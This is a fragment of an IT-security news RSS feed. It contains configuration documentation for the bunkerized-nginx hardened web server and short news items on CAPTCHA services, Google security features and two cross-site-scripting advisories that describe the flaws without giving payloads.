href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy" rel="nofollow" target="_blank" title="here">here</a>.</p>  <p><code>PERMISSIONS_POLICY</code><br>  Values : <em>feature=(allow list)</em><br>  Default value : accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), display-capture=(), document-domain=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), sync-xhr=(), usb=(), vibrate=(), vr=()<br>  Context : <em>global</em>, <em>multisite</em><br>  Tells the browser which features can be used on the website.<br>  More info <a href="https://www.w3.org/TR/permissions-policy-1/" rel="nofollow" target="_blank" title="here">here</a>.</p>  <p><code>COOKIE_FLAGS</code><br>  Values : <em>* HttpOnly</em> | <em>MyCookie secure SameSite=Lax</em> | <em>...</em><br>  Default value : <em>* HttpOnly SameSite=Lax</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Adds some security to the cookies set by the server.<br>  Accepted value can be found <a href="https://github.com/AirisX/nginx_cookie_flag_module" rel="nofollow" target="_blank" title="here">here</a>.</p>  <p><code>COOKIE_AUTO_SECURE_FLAG</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  When set to <em>yes</em>, the <em>secure</em> will be automatically added to cookies when using HTTPS.</p>  <p><code>STRICT_TRANSPORT_POLICY</code><br>  Values : <em>max-age=expireTime [; includeSubDomains] [; preload]</em><br>  Default value : <em>max-age=31536000</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Tells the browser to use exclusively HTTPS instead of HTTP when communicating with the server.<br>  More info <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security" rel="nofollow" target="_blank" title="here">here</a>.</p>  <p><code>CONTENT_SECURITY_POLICY</code><br>  Values : <em>&lt;directive 1&gt;; &lt;directive 2&gt;; ...</em><br>  Default value : <em>default-src 'self'; frame-ancestors 'self'; form-action 'self'; block-all-mixed-content; sandbox allow-forms allow-same-origin allow-scripts; reflected-xss block; base-uri 'self'; referrer no-referrer</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Policy to be used when loading resources (scripts, forms, frames, ...).<br>  More info <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy" rel="nofollow" target="_blank" title="here">here</a>.</p>  <br><span><b>Blocking</b></span><br>  <br><b>Antibot</b><br>  <p><code>USE_ANTIBOT</code><br>  Values : <em>no</em> | <em>cookie</em> | <em>javascript</em> | <em>captcha</em> | <em>recaptcha</em><br>  Default value : <em>no</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to another allowed value than <em>no</em>, users must complete a "challenge" before accessing the pages on your website :</p>  <ul>  <li><em>cookie</em> : asks the users to set a cookie</li>  <li><em>javascript</em> : users must execute a javascript code</li>  <li><em>captcha</em> : a text captcha must be resolved by the users</li>  <li><em>recaptcha</em> : use <a href="https://developers.google.com/recaptcha/intro" rel="nofollow" target="_blank" title="Google reCAPTCHA v3">Google reCAPTCHA v3</a> score to allow/deny users</li>  </ul>  <p><code>ANTIBOT_URI</code><br>  Values : <em>&lt;any valid uri&gt;</em><br>  Default value : <em>/challenge</em><br>  Context : <em>global</em>, <em>multisite</em><br>  A valid and unused URI to redirect users when <code>USE_ANTIBOT</code> is used. Be sure that it doesn't exist on your website.</p>  <p><code>ANTIBOT_SESSION_SECRET</code><br>  Values : <em>random</em> | <em>&lt;32 chars of your choice&gt;</em><br>  Default value : <em>random</em><br>  Context : <em>global</em>, <em>multisite</em><br>  A secret used to generate sessions when <code>USE_ANTIBOT</code> is set. Using the special <em>random</em> value will generate a random one. Be sure to use the same value when you are in a multi-server environment (so sessions are valid in all the servers).</p>  <p><code>ANTIBOT_RECAPTCHA_SCORE</code><br>  Values : <em>&lt;0.0 to 1.0&gt;</em><br>  Default value : <em>0.7</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The minimum score required when <code>USE_ANTIBOT</code> is set to <em>recaptcha</em>.</p>  <p><code>ANTIBOT_RECAPTCHA_SITEKEY</code><br>  Values : <em>&lt;public key given by Google&gt;</em><br>  Default value :<br>  Context : <em>global</em><br>  The sitekey given by Google when <code>USE_ANTIBOT</code> is set to <em>recaptcha</em>.</p>  <p><code>ANTIBOT_RECAPTCHA_SECRET</code><br>  Values : <em>&lt;private key given by Google&gt;</em><br>  Default value :<br>  Context : <em>global</em><br>  The secret given by Google when <code>USE_ANTIBOT</code> is set to <em>recaptcha</em>.</p>  <br><b>External blacklists</b><br>  <p><code>BLOCK_USER_AGENT</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em>  Context : <em>global</em>, <em>multisite</em><br>  If set to yes, block clients with "bad" user agent.<br>  Blacklist can be found <a href="https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list" rel="nofollow" target="_blank" title="here">here</a>.</p>  <p><code>BLOCK_TOR_EXIT_NODE</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Is set to yes, will block known TOR exit nodes.<br>  Blacklist can be found <a href="https://iplists.firehol.org/?ipset=tor_exits" rel="nofollow" target="_blank" title="here">here</a>.</p>  <p><code>BLOCK_PROXIES</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Is set to yes, will block known proxies.<br>  Blacklist can be found <a href="https://iplists.firehol.org/?ipset=firehol_proxies" rel="nofollow" target="_blank" title="here">here</a>.</p>  <p><code>BLOCK_ABUSERS</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Is set to yes, will block known abusers.<br>  Blacklist can be found <a href="https://iplists.firehol.org/?ipset=firehol_abusers_30d" rel="nofollow" target="_blank" title="here">here</a>.</p>  <br><b>DNSBL</b><br>  <p><code>USE_DNSBL</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to <em>yes</em>, DNSBL checks will be performed to the servers specified in the <code>DNSBL_LIST</code> environment variable.</p>  <p><code>DNSBL_LIST</code><br>  Values : <em>&lt;list of DNS zones separated with spaces&gt;</em><br>  Default value : <em>bl.blocklist.de problems.dnsbl.sorbs.net sbl.spamhaus.org xbl.spamhaus.org</em><br>  Context : <em>global</em><br>  The list of DNSBL zones to query when <code>USE_DNSBL</code> is set to <em>yes</em>.</p>  <br><b>CrowdSec</b><br>  <p><code>USE_CROWDSEC</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to <em>yes</em>, <a href="https://github.com/crowdsecurity/crowdsec" rel="nofollow" target="_blank" title="CrowdSec">CrowdSec</a> will be enabled with the <a href="https://hub.crowdsec.net/author/crowdsecurity/collections/nginx" rel="nofollow" target="_blank" title="nginx collection">nginx collection</a>. API pulls will be done automaticaly.</p>  <br><b>Custom whitelisting</b><br>  <p><code>USE_WHITELIST_IP</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to <em>yes</em>, lets you define custom IP addresses to be whitelisted through the <code>WHITELIST_IP_LIST</code> environment variable.</p>  <p><code>WHITELIST_IP_LIST</code><br>  Values : <em>&lt;list of IP addresses separated with spaces&gt;</em><br>  Default value : <em>23.21.227.69 40.88.21.235 50.16.241.113 50.16.241.114 50.16.241.117 50.16.247.234 52.204.97.54 52.5.190.19 54.197.234.188 54.208.100.253 54.208.102.37 107.21.1.8</em><br>  Context : <em>global</em><br>  The list of IP addresses to whitelist when <code>USE_WHITELIST_IP</code> is set to <em>yes</em>. The default list contains IP addresses of the <a href="https://help.duckduckgo.com/duckduckgo-help-pages/results/duckduckbot/" rel="nofollow" target="_blank" title="DuckDuckGo crawler">DuckDuckGo crawler</a>.</p>  <p><code>USE_WHITELIST_REVERSE</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to <em>yes</em>, lets you define custom reverse DNS suffixes to be whitelisted through the <code>WHITELIST_REVERSE_LIST</code> environment variable.</p>  <p><code>WHITELIST_REVERSE_LIST</code><br>  Values : <em>&lt;list of reverse DNS suffixes separated with spaces&gt;</em><br>  Default value : <em>.googlebot.com .google.com .search.msn.com .crawl.yahoot.net .crawl.baidu.jp .crawl.baidu.com .yandex.com .yandex.ru .yandex.net</em><br>  Context : <em>global</em><br>  The list of reverse DNS suffixes to whitelist when <code>USE_WHITELIST_REVERSE</code> is set to <em>yes</em>. The default list contains suffixes of major search engines.</p>  <br><b>Custom blacklisting</b><br>  <p><code>USE_BLACKLIST_IP</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to <em>yes</em>, lets you define custom IP addresses to be blacklisted through the <code>BLACKLIST_IP_LIST</code> environment variable.</p>  <p><code>BLACKLIST_IP_LIST</code><br>  Values : <em>&lt;list of IP addresses separated with spaces&gt;</em><br>  Default value :<br>  Context : <em>global</em><br>  The list of IP addresses to blacklist when <code>USE_BLACKLIST_IP</code> is set to <em>yes</em>.</p>  <p><code>USE_BLACKLIST_REVERSE</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to <em>yes</em>, lets you define custom reverse DNS suffixes to be blacklisted through the <code>BLACKLIST_REVERSE_LIST</code> environment variable.</p>  <p><code>BLACKLIST_REVERSE_LIST</code><br>  Values : <em>&lt;list of reverse DNS suffixes separated with spaces&gt;</em><br>  Default value : <em>.shodan.io</em><br>  Context : <em>global</em><br>  The list of reverse DNS suffixes to blacklist when <code>USE_BLACKLIST_REVERSE</code> is set to <em>yes</em>.</p>  <br><b>Requests limiting</b><br>  <p><code>USE_LIMIT_REQ</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to yes, the amount of HTTP requests made by a user will be limited during a period of time.<br>  More info rate limiting <a href="https://www.nginx.com/blog/rate-limiting-nginx/" rel="nofollow" target="_blank" title="here">here</a>.</p>  <p><code>LIMIT_REQ_RATE</code><br>  Values : <em>Xr/s</em> | <em>Xr/m</em><br>  Default value : <em>20r/s</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The rate limit to apply when <code>USE_LIMIT_REQ</code> is set to <em>yes</em>. Default is 10 requests per second.</p>  <p><code>LIMIT_REQ_BURST</code><br>  Values : <em>&lt;any valid integer&gt;</em><br>  Default value : <em>40</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The number of of requests to put in queue before rejecting requests.</p>  <p><code>LIMIT_REQ_CACHE</code><br>  Values : <em>Xm</em> | <em>Xk</em><br>  Default value : <em>10m</em><br>  Context : <em>global</em><br>  The size of the cache to store information about request limiting.</p>  <br><b>Countries</b><br>  <p><code>BLACKLIST_COUNTRY</code><br>  Values : <em>&lt;country code 1&gt; &lt;country code 2&gt; ...</em><br>  Default value :<br>  Context : <em>global</em>, <em>multisite</em><br>  Block some countries from accessing your website. Use 2 letters country code separated with space.</p>  <p><code>WHITELIST_COUNTRY</code><br>  Values : <em>&lt;country code 1&gt; &lt;country code 2&gt; ...</em><br>  Default value :<br>  Context : <em>global</em>, <em>multisite</em><br>  Only allow specific countries accessing your website. Use 2 letters country code separated with space.</p>  <br><span><b>PHP</b></span><br>  <p><code>REMOTE_PHP</code><br>  Values : <em>&lt;any valid IP/hostname&gt;</em><br>  Default value :<br>  Context : <em>global</em>, <em>multisite</em><br>  Set the IP/hostname address of a remote PHP-FPM to execute .php files. See <code>USE_PHP</code> if you want to run a PHP-FPM instance on the same container as bunkerized-nginx.</p>  <p><code>REMOTE_PHP_PATH</code><br>  Values : <em>&lt;any valid absolute path&gt;</em><br>  Default value : <em>/app</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The path where the PHP files are located inside the server specified in <code>REMOTE_PHP</code>.</p>  <br><span><b>Fail2ban</b></span><br>  <p><code>USE_FAIL2BAN</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to yes, fail2ban will be used to block users getting too much "strange" HTTP codes in a period of time.<br>  Instead of using iptables which is not possible inside a container, fail2ban will dynamically update nginx to ban/unban IP addresses.<br>  If a number (<code>FAIL2BAN_MAXRETRY</code>) of "strange" HTTP codes (<code>FAIL2BAN_STATUS_CODES</code>) is found between a time interval (<code>FAIL2BAN_FINDTIME</code>) then the originating IP address will be ban for a specific period of time (<code>FAIL2BAN_BANTIME</code>).</p>  <p><code>FAIL2BAN_STATUS_CODES</code><br>  Values : <em>&lt;HTTP status codes separated with | char&gt;</em><br>  Default value : <em>400|401|403|404|405|444</em><br>  Context : <em>global</em><br>  List of "strange" error codes that fail2ban will search for.</p>  <p><code>FAIL2BAN_BANTIME</code><br>  Values : <em></em><br>  Default value : <em>3600</em><br>  Context : <em>global</em><br>  The duration time, in seconds, of a ban.</p>  <p><code>FAIL2BAN_FINDTIME</code><br>  Values : <em></em><br>  Default : value : <em>60</em><br>  Context : <em>global</em><br>  The time interval, in seconds, to search for "strange" HTTP status codes.</p>  <p><code>FAIL2BAN_MAXRETRY</code><br>  Values : <em>&lt;any positive integer&gt;</em><br>  Default : value : <em>15</em><br>  Context : <em>global</em><br>  The number of "strange" HTTP status codes to find between the time interval.</p>  <br><span><b>ClamAV</b></span><br>  <p><code>USE_CLAMAV_UPLOAD</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to yes, ClamAV will scan every file uploads and block the upload if the file is detected.</p>  <p><code>USE_CLAMAV_SCAN</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em><br>  If set to yes, ClamAV will scan all the files inside the container every day.</p>  <p><code>CLAMAV_SCAN_REMOVE</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em><br>  If set to yes, ClamAV will automatically remove the detected files.</p>  <br><span><b>Misc</b></span><br>  <p><code>ADDITIONAL_MODULES</code><br>  Values : <em>&lt;list of packages separated with space&gt;</em><br>  Default value :<br>  Context : <em>global</em><br>  You can specify additional modules to install. All <a href="https://pkgs.alpinelinux.org/packages" rel="nofollow" target="_blank" title="alpine packages">alpine packages</a> are valid.</p>  <p><code>LOGROTATE_MINSIZE</code><br>  Values : <em>x</em> | <em>xk</em> | <em>xM</em> | <em>xG</em><br>  Default value : 10M<br>  Context : <em>global</em><br>  The minimum size of a log file before being rotated (no letter = bytes, k = kilobytes, M = megabytes, G = gigabytes).</p>  <p><code>LOGROTATE_MAXAGE</code><br>  Values : <em>&lt;any integer&gt;</em><br>  Default value : 7<br>  Context : <em>global</em><br>  The number of days before rotated files are deleted.</p>  <br><span><b>Include custom configurations</b></span><br>  <p>Custom configurations files (ending with .conf suffix) can be added in some directory inside the container :</p>  <ul>  <li>/http-confs : http context</li>  <li>/server-confs : server context</li>  </ul>  <p>You just need to use a volume like this :</p>  <div><pre><code>docker run ... -v /path/to/http/confs:/http-confs:ro ... -v /path/to/server/confs:/server-confs:ro ... bunkerity/bunkerized-nginx</code></pre></div>  <p>When <code>MULTISITE</code> is set to <em>yes</em>, .conf files inside the /server-confs directory are loaded by all the server blocks. You can also set custom configuration for a specific server block by adding files in a subdirectory named as the host defined in the <code>SERVER_NAME</code> environment variable. Here is an example :</p>  <div><pre><code>docker run ... -v /path/to/server/confs:/server-confs:ro ... -e MULTISITE=yes -e "SERVER_NAME=app1.domain.com app2.domain.com" ... bunkerity/bunkerized-nginx</code></pre></div>  <p>The <em>/path/to/server/confs</em> directory should have a structure like this :</p>  <pre><code>/path/to/server/confs<br>├── app1.domain.com<br>│   └── custom.conf<br>│   └── ...<br>└── app2.domain.com<br>    └── custom.conf<br>    └── ...<br></code></pre>  <br><span><b>Cache data</b></span><br>  <p>You can store cached data (blacklists, geoip DB, ...) to avoid downloading them again after a container deletion by mounting a volume on the /cache directory :</p>  <div><pre><code>docker run ... -v /path/to/cache:/cache ... bunkerity/bunkerized-nginx</code></pre></div>  <br><br><div><b><span><a class="kiploit-download" href="https://github.com/bunkerity/bunkerized-nginx" rel="nofollow" target="_blank" title="Download Bunkerized-Nginx">Download Bunkerized-Nginx</a></span></b></div><img src="http://feeds.feedburner.com/~r/PentestTools/~4/hq2zevJCuyg" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[hCaptcha Runs On 15% Of the Internet]]></title>
<description><![CDATA[In a blog post, hCaptcha announced that its bot detector is running on about 15% of the internet, adding they they "took most of this market share directly from Google reCAPTCHA." From the post: Competing with Google and other Big Tech companies seems like a tall order: their monopolistic market ...]]></description>
<link>https://tsecurity.de/de/1308907/it-security-nachrichten/hcaptcha-runs-on-15-of-the-internet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1308907/it-security-nachrichten/hcaptcha-runs-on-15-of-the-internet/</guid>
<pubDate>Thu, 26 Nov 2020 10:46:49 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In a blog post, hCaptcha announced that its bot detector is running on about 15% of the internet, adding they they "took most of this market share directly from Google reCAPTCHA." From the post: Competing with Google and other Big Tech companies seems like a tall order: their monopolistic market power, platform effects and army of highly paid developers are generally considered too powerful to tackle for anyone but other tech giants such as Facebook or Amazon. Our story shows that it doesn't have to be that way -- you can beat Big Tech by focussing on privacy. Consider Google reCAPTCHA, which consumes enormous amounts of behavioral data to determine whether web users are legitimate humans or bots. At hCaptcha, we have deliberately taken a very different approach, using privacy-preserving machine learning techniques to identify typical bot behaviors at high accuracy, all while consuming and storing as little data as possible.
 
Google is an ad company, and their security products look very much like their ad products: they track user behavior on every page of a website and across the web. We designed hCaptcha to be as privacy-friendly as possible from day one. This led to a completely different approach to the problem. As it turns out, tracking users across the web and tying their web history to their identity is completely unnecessary for achieving good security. The many companies that have switched over to hCaptcha often report equal or better performance in bot detection and mitigation despite our privacy focus.
 
A growing number of critics have pointed out that Google's disregard for user privacy should concern customers looking to protect their websites and apps. At the same time, stopping bots from accessing publisher sites can reveal ad fraud, pitting Google's reCAPTCHA product directly against their ad business, which produces over 80% of their revenue. Every bot Google detects should be earning zero ad dollars. Google's company incentives are thus poorly aligned with the users of their security services, and this may be one explanation for the poor performance of their reCAPTCHA security offering.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=hCaptcha+Runs+On+15%25+Of+the+Internet%3A+https%3A%2F%2Fbit.ly%2F3fEOaIe"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fit.slashdot.org%2Fstory%2F20%2F11%2F26%2F0252208%2Fhcaptcha-runs-on-15-of-the-internet%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://it.slashdot.org/story/20/11/26/0252208/hcaptcha-runs-on-15-of-the-internet?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Matrix Synapse up to 1.20.x Session m.login.recaptcha session cross site scripting]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Matrix Synapse up to 1.20.x. Affected by this issue is an unknown code of the file /_matrix/client/r0/auth/m.login.recaptcha of the component Session. Upgrading to version 1.21.0 eliminates this vulnerability. Applying a patc...]]></description>
<link>https://tsecurity.de/de/1304084/sicherheitsluecken/matrix-synapse-up-to-120x-session-mloginrecaptcha-session-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1304084/sicherheitsluecken/matrix-synapse-up-to-120x-session-mloginrecaptcha-session-cross-site-scripting/</guid>
<pubDate>Sat, 21 Nov 2020 12:03:59 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as problematic, has been found in <a href="https://vuldb.com/?product.matrix:synapse">Matrix Synapse up to 1.20.x</a>. Affected by this issue is an unknown code of the file <em>/_matrix/client/r0/auth/m.login.recaptcha</em> of the component <em>Session</em>. Upgrading to version 1.21.0 eliminates this vulnerability. Applying a patch is able to eliminate this problem. The bugfix is ready for download at <a href="https://vuldb.com/?countermeasure_patch_url.162866">github.com</a>. The best possible mitigation is suggested to be upgrading to the latest version.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google reCAPTCHA service under the microscope: Questions raised over privacy promises, cookie use]]></title>
<description><![CDATA[Web giant insists anti-bot service isn't used for personalized ads – but cookie claims don't quite add up Analysis  Six years ago, Google revised its reCAPTCHA service, designed to filter out bots, scrapers, and other automated web browsing, and allow humans through to websites.…]]></description>
<link>https://tsecurity.de/de/1284201/it-security-nachrichten/google-recaptcha-service-under-the-microscope-questions-raised-over-privacy-promises-cookie-use/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1284201/it-security-nachrichten/google-recaptcha-service-under-the-microscope-questions-raised-over-privacy-promises-cookie-use/</guid>
<pubDate>Mon, 02 Nov 2020 19:01:40 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Web giant insists anti-bot service isn't used for personalized ads – but cookie claims don't quite add up</h4> <p><strong>Analysis</strong>  Six years ago, Google revised its reCAPTCHA service, designed to filter out bots, scrapers, and other automated web browsing, and allow humans through to websites.…</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google reCAPTCHA Service Under The Privacy Microscope]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/1284035/it-security-nachrichten/google-recaptcha-service-under-the-privacy-microscope/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1284035/it-security-nachrichten/google-recaptcha-service-under-the-privacy-microscope/</guid>
<pubDate>Mon, 02 Nov 2020 16:31:48 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Google reCAPTCHA service under the microscope: Questions raised over privacy promises, cookie use]]></title>
<description><![CDATA[Web giant insists anti-bot service isn't used for personalized ads – but cookie claims don't quite add up Analysis  Six years ago, Google revised its reCAPTCHA service, designed to filter out bots, scrapers, and other automated web browsing, and allow humans through to websites.…]]></description>
<link>https://tsecurity.de/de/1283534/it-security-nachrichten/google-recaptcha-service-under-the-microscope-questions-raised-over-privacy-promises-cookie-use/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1283534/it-security-nachrichten/google-recaptcha-service-under-the-microscope-questions-raised-over-privacy-promises-cookie-use/</guid>
<pubDate>Mon, 02 Nov 2020 10:16:36 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Web giant insists anti-bot service isn't used for personalized ads – but cookie claims don't quite add up</h4> <p><strong>Analysis</strong>  Six years ago, Google revised its reCAPTCHA service, designed to filter out bots, scrapers, and other automated web browsing, and allow humans through to websites.…</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2020-26891]]></title>
<description><![CDATA[AuthRestServlet in Matrix Synapse before 1.21.0 is vulnerable to XSS due to unsafe interpolation of the session GET parameter. This allows a remote attacker to execute an XSS attack on the domain Synapse is hosted on, by supplying the victim user with a malicious URL to the /_matrix/client/r0/aut...]]></description>
<link>https://tsecurity.de/de/1269985/sicherheitsluecken/cve-2020-26891/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1269985/sicherheitsluecken/cve-2020-26891/</guid>
<pubDate>Mon, 19 Oct 2020 21:33:07 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AuthRestServlet in Matrix Synapse before 1.21.0 is vulnerable to XSS due to unsafe interpolation of the session GET parameter. This allows a remote attacker to execute an XSS attack on the domain Synapse is hosted on, by supplying the victim user with a malicious URL to the /_matrix/client/r0/auth/m.login.recaptcha or /_matrix/client/r0/auth/m.login.terms Synapse 974923.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google seems to have issues with me trying to find how to do stuff in Linux]]></title>
<description><![CDATA[So last night I went in some form of rabbit hole about learning more of Linux and how to do stuff I want. I get myself some Latte Panda and want to make it as dedicated Linux machine for various stuff. However upon searching, I got prompted with ReCaptcha, that I "search a lot". First time it hap...]]></description>
<link>https://tsecurity.de/de/1261088/linux-tipps/google-seems-to-have-issues-with-me-trying-to-find-how-to-do-stuff-in-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1261088/linux-tipps/google-seems-to-have-issues-with-me-trying-to-find-how-to-do-stuff-in-linux/</guid>
<pubDate>Fri, 09 Oct 2020 15:30:15 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>So last night I went in some form of rabbit hole about learning more of Linux and how to do stuff I want. I get myself some Latte Panda and want to make it as dedicated Linux machine for various stuff. However upon searching, I got prompted with ReCaptcha, that I "search a lot". First time it happened to me. And those searches wasn't how to hack stuff or anything like that. Basically normal Linux Knowledge. And I did not even search that much, when I have some programming issue, google searches flying way more. I am the only one on this IP, so it's not like there is a huge traffic here. </p> <p>I guess time to switch to finally another search Engine, I grow accustomed to Bing (for programming stuff, search in official documentaries in a smart way) and DuckDuck Go (on RPi Linux, where it's default), however google is still the best for a random stuff on the internet, not IT oriented.</p> <p>Anyone else experienced this?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/M1chlCZ"> /u/M1chlCZ </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/j7xyvj/google_seems_to_have_issues_with_me_trying_to/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/j7xyvj/google_seems_to_have_issues_with_me_trying_to/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[cf7-invisible-recaptcha Plugin up to 1.3.1 on WordPress cross site scripting]]></title>
<description><![CDATA[A vulnerability was found in cf7-invisible-recaptcha Plugin up to 1.3.1 on WordPress (WordPress Plugin). It has been declared as problematic. This vulnerability affects some unknown processing. Upgrading to version 1.3.2 eliminates this vulnerability.]]></description>
<link>https://tsecurity.de/de/1210645/sicherheitsluecken/cf7-invisible-recaptcha-plugin-up-to-131-on-wordpress-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1210645/sicherheitsluecken/cf7-invisible-recaptcha-plugin-up-to-131-on-wordpress-cross-site-scripting/</guid>
<pubDate>Sun, 16 Aug 2020 19:18:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.cf7-invisible-recaptcha_plugin">cf7-invisible-recaptcha Plugin up to 1.3.1</a> on WordPress (<a href="https://vuldb.com/?type.wordpress_plugin">WordPress Plugin</a>). It has been declared as problematic. This vulnerability affects some unknown processing. Upgrading to version 1.3.2 eliminates this vulnerability.]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp: Facebooks Messenger bekommt neue Funktionen]]></title>
<description><![CDATA[Leichterer Austausch von Kontaktdaten via QRCode, animierte Sticker und bessere Gruppen-Video-Chats

					
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('https://images.derstandard.at/img/2020/07/06/whatsapp2.jpg');
									});]]></description>
<link>https://tsecurity.de/de/1170106/it-nachrichten/whatsapp-facebooks-messenger-bekommt-neue-funktionen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1170106/it-nachrichten/whatsapp-facebooks-messenger-bekommt-neue-funktionen/</guid>
<pubDate>Mon, 06 Jul 2020 15:17:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://images.derstandard.at/img/2020/07/06/whatsapp2.jpg?w=150&amp;s=9983b3d7">Leichterer Austausch von Kontaktdaten via QRCode, animierte Sticker und bessere Gruppen-Video-Chats<div id="ytplayer_https://images.derstandard.at/img/2020/07/06/whatsapp2.jpg"></div>

					<script>
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('https://images.derstandard.at/img/2020/07/06/whatsapp2.jpg');
									}); 
									</script>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Advanced Protection Program comes to Google Nest]]></title>
<description><![CDATA[Posted by Shuvo Chatterjee, Product Manager, Advanced Protection ProgramThe Advanced Protection Program is our strongest level of Google Account security for people at high risk of targeted online attacks, such as journalists, activists, business leaders, and people working on elections. Anyone c...]]></description>
<link>https://tsecurity.de/de/1134482/it-security-nachrichten/the-advanced-protection-program-comes-to-google-nest/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1134482/it-security-nachrichten/the-advanced-protection-program-comes-to-google-nest/</guid>
<pubDate>Mon, 01 Jun 2020 19:16:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
